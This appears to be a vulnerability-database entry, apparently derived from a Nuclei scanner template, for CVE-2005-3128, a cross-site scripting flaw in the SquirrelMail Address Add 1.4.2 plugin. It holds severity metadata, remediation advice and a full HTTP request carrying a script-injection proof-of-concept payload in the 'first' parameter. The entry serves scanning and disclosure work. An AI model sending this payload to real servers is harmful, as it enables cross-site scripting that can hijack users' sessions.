| Title | SquirrelMail Address Add 1.4.2 - Cross-Site Scripting |
|---|---|
| Author | dhiyaneshDk |
| Severity | Medium |
| Impact | Attackers can execute arbitrary scripts in the victim's browser, leading to session hijacking or defacement. |
| Remediation | Apply the latest security patches and updates from the vendor to address this vulnerability. |
| CVSS Score | 5.4 |
| EPSS Score | 0.01733 |
| CVE ID | CVE-2005-3128 |
| CWE ID | CWE-80 |
| Tags | cve cve2005 xss squirrelmail plugin edb vkev vuln |
SquirrelMail Address Add 1.4.2 plugin contains a cross-site scripting vulnerability. It fails to properly sanitize user-supplied input, thus allowing an attacker to execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
GET /plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2005/CVE-2005-3128.yaml
🦈 Packet Capture: ⬇️ Download cve-2005-3128.pcap
N/AN/A